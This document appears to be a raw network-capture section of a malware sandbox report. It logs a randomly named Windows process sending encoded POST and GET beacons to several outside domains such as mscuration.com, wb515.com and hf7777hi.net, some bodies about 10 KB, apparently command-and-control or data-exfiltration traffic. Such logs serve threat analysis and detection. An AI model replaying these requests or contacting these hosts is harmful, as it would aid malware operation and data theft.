                                              Jul 8, 2024 09:35:29.340648890 CEST742OUTPOST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 51 69 4d 44 39 4f 39 2f 39 45 57 6d 68 43 71 32 33 75 4e 6a 39 65 4b 58 33 75 56 6e 6e 55 52 33 35 49 4e 7a 45 74 6a 75 35 65 38 43 5a 6d 76 53 38 6b 62 6a 70 67 48 2b 6f 33 72 30 53 59 45 57 54 6c 46 35 57 55 34 66 73 70 31 6f 57 6f 68 52 45 65 4d 4e 36 38 46 54 54 55 44 56 59 4e 6f 36 51 41 76 39 44 75 39 73 6e 49 6b 39 4a 35 7a 6a 4c 6a 64 66 6c 39 48 4a 7a 73 68 69 65 76 79 77 6e 56 61 41 72 68 53 36 74 6a 2f 35 57 71 70 31 71 44 32 38 37 48 50 54 6d 68 51 54 41 41 6f 75 48 53 67 53 73 54 50 67 31 69 36 64 38 72 43 6d 2f 67 6e 63 47 54 68 74 35 72 46 6b 2b 4b 48 78 46 32 43 4a 37 63 44 4a 63 41 59 3d
                                              Data Ascii: gNl=oQb20TZpebgJQiMD9O9/9EWmhCq23uNj9eKX3uVnnUR35INzEtju5e8CZmvS8kbjpgH+o3r0SYEWTlF5WU4fsp1oWohREeMN68FTTUDVYNo6QAv9Du9snIk9J5zjLjdfl9HJzshievywnVaArhS6tj/5Wqp1qD287HPTmhQTAAouHSgSsTPg1i6d8rCm/gncGTht5rFk+KHxF2CJ7cDJcAY=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.4497693.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:31.870661974 CEST10824OUTPOST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 51 69 4d 44 39 4f 39 2f 39 45 57 6d 68 43 71 32 33 75 4e 6a 39 65 4b 58 33 75 56 6e 6e 55 5a 33 34 2b 5a 7a 48 4d 6a 75 6f 75 38 43 58 47 76 58 38 6b 62 75 70 67 50 79 6f 33 32 4a 53 61 73 57 63 6e 4e 35 51 6c 34 66 6e 70 31 6f 65 49 68 4d 4c 2b 4e 4e 36 38 55 62 54 55 54 56 59 4e 6f 36 51 47 44 39 4b 66 39 73 68 49 6b 2b 41 5a 7a 52 59 7a 63 79 6c 39 66 2f 7a 74 67 64 66 65 53 77 6d 31 71 41 6f 58 75 36 6b 6a 2f 33 58 61 70 74 71 44 72 38 37 48 54 6c 6d 69 4d 31 41 48 41 75 57 6b 78 36 37 77 33 42 6d 77 4f 43 6f 36 65 34 6e 53 4c 75 64 44 6c 6e 6f 75 46 4d 39 6f 53 66 4a 46 7a 72 6a 74 4c 51 41 6b 59 63 61 53 44 32 61 6f 70 6d 34 70 53 51 72 42 66 67 72 56 2f 6c 73 35 6e 61 55 4c 64 63 6f 74 65 2f 30 67 61 34 45 33 63 32 36 6d 69 6b 73 70 4b 70 39 38 33 43 75 50 6e 53 33 57 63 74 34 52 4c 70 31 2f 68 7a 4b 65 55 48 6a 61 6e 68 47 70 58 48 74 63 43 6e 68 75 39 30 44 63 31 59 34 61 75 59 2b 32 78 4c 67 73 63 7a 73 38 49 72 48 52 57 37 47 71 2f 67 6e 73 [TRUNCATED]
                                              Data Ascii: gNl=oQb20TZpebgJQiMD9O9/9EWmhCq23uNj9eKX3uVnnUZ34+ZzHMjuou8CXGvX8kbupgPyo32JSasWcnN5Ql4fnp1oeIhML+NN68UbTUTVYNo6QGD9Kf9shIk+AZzRYzcyl9f/ztgdfeSwm1qAoXu6kj/3XaptqDr87HTlmiM1AHAuWkx67w3BmwOCo6e4nSLudDlnouFM9oSfJFzrjtLQAkYcaSD2aopm4pSQrBfgrV/ls5naULdcote/0ga4E3c26mikspKp983CuPnS3Wct4RLp1/hzKeUHjanhGpXHtcCnhu90Dc1Y4auY+2xLgsczs8IrHRW7Gq/gnsKGCPUymvJOwJZ5RtG35ORzDrqrCGEQcMciNa1mg9uikvhxZUxvJa2yKhmIW+lIgLScysbST/6BE7Ykx8PwbCvDsEoeHMJhj5TaQUA9sxrcI9kwh1YODl7gX1FPN0WVEvFIxUhLgk/MJbLmrRitT3AoPICjw5CFDAq/QuYll4E0jigC2oXQJbJat35mK8RNAPzgR2YWHMcRU/Jt87pBeivXX2iB6zywAkS0PC/nD0u/aNf3k6mgpyDE2aZ1WXkBzODlKflttyB1DohNWq+8sktuVcMxtVQeTvMU2pwsVf3VXPW6etshCLTic2W2Ty9oIXikEEHvo4EiONdCfxNzfZ+WV6uEw0l5vNWXfMO2gDwTBpWIbZoIXXB9LHGRRBUAK7uR6KBhYs+6hlPfbN8jijaJ+iWI5tCP4fLCTmn6UFGL5aa9pJXDjVxVx8vHGSknWenqYWywb2P+8lCiTHpe2FT8aGmG7+zU9uq577taU1T1tAjPuWfIocnSZKgnoAY1BRP6IQoKjOfcxxP+u4DtWasKHcuO3Wd/v23YPxY/Ed9RU1O9XbTv+UJi3XZHyEfW82c3B6PsFxFze6OiqbrkoB0WjmP7IAWZrD6dlQ3Mox4rHf10d99q38UaEprpXi0te9SzLflotJDJQ2aA4naeColl0dvvxi5i4wdN [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.4497703.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:34.398853064 CEST453OUTGET /g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.mscuration.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:34.889822960 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:35:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 4e 6c 3d 6c 53 7a 57 33 6e 56 65 57 36 4a 66 4d 47 4d 41 37 75 4e 2f 37 6c 47 47 70 6c 58 30 68 65 5a 62 7a 37 4f 2b 6c 50 56 33 74 6b 78 75 39 37 77 69 64 2f 6e 59 70 76 6f 69 51 45 54 31 38 43 66 64 69 54 53 45 6b 51 6a 4e 5a 59 70 69 51 79 73 48 59 58 6f 62 75 6f 45 58 51 61 42 36 45 36 64 70 37 4b 41 45 59 58 4f 30 41 4f 41 75 53 6b 6a 57 4c 38 5a 46 79 59 6b 3d 26 51 64 43 3d 41 46 4d 68 35 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.44977138.47.226.116805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:40.869652033 CEST707OUTPOST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 36 37 4d 48 53 61 34 62 72 45 74 45 67 46 44 51 62 33 53 55 6c 69 74 79 76 2f 46 34 69 74 43 58 74 6c 34 59 48 73 71 34 79 52 66 48 47 73 49 6d 32 34 45 6a 7a 64 6b 59 4c 4c 41 45 67 46 57 71 37 79 65 36 76 37 4a 30 6a 2b 30 42 79 4f 38 74 45 54 52 53 72 35 69 66 6b 68 4c 32 7a 63 47 49 4e 48 49 30 62 55 36 2b 63 46 79 6a 46 31 42 44 73 4f 43 73 52 4b 32 71 6f 35 6f 2f 30 52 62 55 64 56 4b 42 6e 38 4e 51 4a 56 4a 65 37 4d 72 66 69 6c 37 6e 34 32 5a 68 33 4f 51 2b 50 4b 37 39 2f 4d 4c 59 78 4a 39 6d 37 47 5a 6f 57 74 4e 5a 55 38 68 70 6f 6e 2b 2b 6f 34 6b 42 74 52 69 46 46 41 3d 3d
                                              Data Ascii: gNl=67MHSa4brEtEgFDQb3SUlityv/F4itCXtl4YHsq4yRfHGsIm24EjzdkYLLAEgFWq7ye6v7J0j+0ByO8tETRSr5ifkhL2zcGINHI0bU6+cFyjF1BDsOCsRK2qo5o/0RbUdVKBn8NQJVJe7Mrfil7n42Zh3OQ+PK79/MLYxJ9m7GZoWtNZU8hpon++o4kBtRiFFA==
                                              Jul 8, 2024 09:35:41.787241936 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.44977238.47.226.116805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:43.402555943 CEST727OUTPOST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 36 37 4d 48 53 61 34 62 72 45 74 45 68 6b 7a 51 64 55 4b 55 6a 43 74 78 69 76 46 34 6f 4e 43 54 74 6c 6b 59 48 6f 79 6f 78 6e 76 48 42 4f 41 6d 33 35 45 6a 77 64 6b 59 66 62 42 4d 75 6c 57 62 37 79 53 59 76 2f 4a 30 6a 39 49 42 79 4d 6b 74 45 6b 46 56 36 35 69 64 70 42 4c 30 75 73 47 49 4e 48 49 30 62 55 76 54 63 46 71 6a 46 45 78 44 73 76 43 6a 53 4b 32 74 34 4a 6f 2f 77 52 62 59 64 56 4b 2f 6e 2f 4a 36 4a 58 78 65 37 4a 48 66 73 55 37 6b 7a 32 5a 6a 6f 2b 52 30 45 4b 58 7a 35 73 6a 4a 35 71 4e 2f 6d 48 5a 56 61 4c 63 44 46 4e 41 2b 36 6e 61 4e 31 2f 74 31 67 53 66 4d 65 44 55 49 46 6f 45 74 61 38 45 2b 73 4c 34 6d 69 47 50 6c 34 31 6b 3d
                                              Data Ascii: gNl=67MHSa4brEtEhkzQdUKUjCtxivF4oNCTtlkYHoyoxnvHBOAm35EjwdkYfbBMulWb7ySYv/J0j9IByMktEkFV65idpBL0usGINHI0bUvTcFqjFExDsvCjSK2t4Jo/wRbYdVK/n/J6JXxe7JHfsU7kz2Zjo+R0EKXz5sjJ5qN/mHZVaLcDFNA+6naN1/t1gSfMeDUIFoEta8E+sL4miGPl41k=
                                              Jul 8, 2024 09:35:44.298962116 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.44977338.47.226.116805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:45.931587934 CEST10809OUTPOST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 36 37 4d 48 53 61 34 62 72 45 74 45 68 6b 7a 51 64 55 4b 55 6a 43 74 78 69 76 46 34 6f 4e 43 54 74 6c 6b 59 48 6f 79 6f 78 6b 50 48 42 37 55 6d 78 61 63 6a 78 64 6b 59 41 72 42 50 75 6c 57 47 37 7a 36 63 76 2b 31 37 6a 37 45 42 79 70 77 74 43 57 39 56 7a 35 69 64 31 78 4c 33 7a 63 47 6e 4e 47 6c 7a 62 55 2f 54 63 46 71 6a 46 48 70 44 72 2b 43 6a 55 4b 32 71 6f 35 6f 6a 30 52 62 38 64 55 76 48 6e 38 6c 41 4a 48 52 65 37 74 6e 66 75 6d 54 6b 77 57 5a 74 70 2b 51 68 45 4b 61 78 35 73 2b 6c 35 71 4a 46 6d 48 74 56 4c 73 6c 79 65 63 74 34 73 68 4c 51 6e 65 4e 73 76 51 58 56 48 6a 6f 57 4e 39 4d 71 4d 38 77 55 71 5a 41 71 33 6a 6a 43 74 6a 50 62 64 36 69 65 4d 6e 75 70 6a 4b 66 42 30 57 35 4d 47 61 48 36 64 6f 37 2b 35 32 58 63 4b 4b 6d 6b 30 49 76 4d 71 5a 33 32 71 61 6d 77 6d 47 55 53 38 4d 48 31 51 4a 46 32 33 4e 45 52 44 76 2b 6c 6a 67 77 4c 52 35 55 47 66 2b 71 77 54 36 42 6c 79 36 6a 66 73 62 55 7a 72 49 45 4e 2f 47 37 72 39 51 71 55 76 68 72 6f 34 2b 41 65 36 55 74 72 37 48 32 43 4a 6b [TRUNCATED]
                                              Data Ascii: gNl=67MHSa4brEtEhkzQdUKUjCtxivF4oNCTtlkYHoyoxkPHB7UmxacjxdkYArBPulWG7z6cv+17j7EBypwtCW9Vz5id1xL3zcGnNGlzbU/TcFqjFHpDr+CjUK2qo5oj0Rb8dUvHn8lAJHRe7tnfumTkwWZtp+QhEKax5s+l5qJFmHtVLslyect4shLQneNsvQXVHjoWN9MqM8wUqZAq3jjCtjPbd6ieMnupjKfB0W5MGaH6do7+52XcKKmk0IvMqZ32qamwmGUS8MH1QJF23NERDv+ljgwLR5UGf+qwT6Bly6jfsbUzrIEN/G7r9QqUvhro4+Ae6Utr7H2CJkhJLz7JN7XAW/epO64CiLAdKPJFTtFsu52iRb/Tl1SkNWZaMCfj0cXFCcqe3Pe1uTesaDjtMFcYctQL5YjXZcO/LUaM8kfBWeAZtf+I36vkDg4Fzd9E6ySlbmXS8R9ZzA7ByimrGufttyrL9mq0jksXbHr31+YhdBbClX8C0GgQrq/+0ld6aqBoJ/8DsPwJEAiUXmIQa2L0elhm1y0rdQcGA5ifE6B0qw9coat7hGCNDtZdXFiW27nsgAj5fF6+8CUbWJeBkq8InicgRXKPLskNCeOVy59djSfuNkFyZQSX3Y7Nj/VBEuI901xwtXRcjFv9NYoxJGCjJc0GcGEOhvNscqPTeq0ocihQyDl9s+o6m7b/nnh77Id6prUHN2zGhRokt9BSE+9GJ+ZI54Fs0Tv1M/tTzDKb1RAjI1+KwozLhwU3TzfS8EjQVPWPYU4+BDoxYS/e8ttZIuTmkdeV/EOPfoDwbNwfDHq2Z3kKvIfMcVjTVBq9HkH8A6q6LboOnucN5a8hgvF/IcXyf+k4aQESiXMFOQz7opxi1SdqzHq1aKFyi7XbUUIbCAvke3wO2+uGOFyCh1ZW8zKlZtBkJ5onG1NLGRzFxBjEKXEVkUXrEbxqJ9/gJDf0g28nQrCddROjBzT/lIQDVuBQUKmwNhp1VaWm7wirZyyw [TRUNCATED]
                                              Jul 8, 2024 09:35:46.904247999 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.44977438.47.226.116805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:48.464453936 CEST448OUTGET /fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.wb515.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:49.389127970 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449775132.226.11.158805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:55.554614067 CEST716OUTPOST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
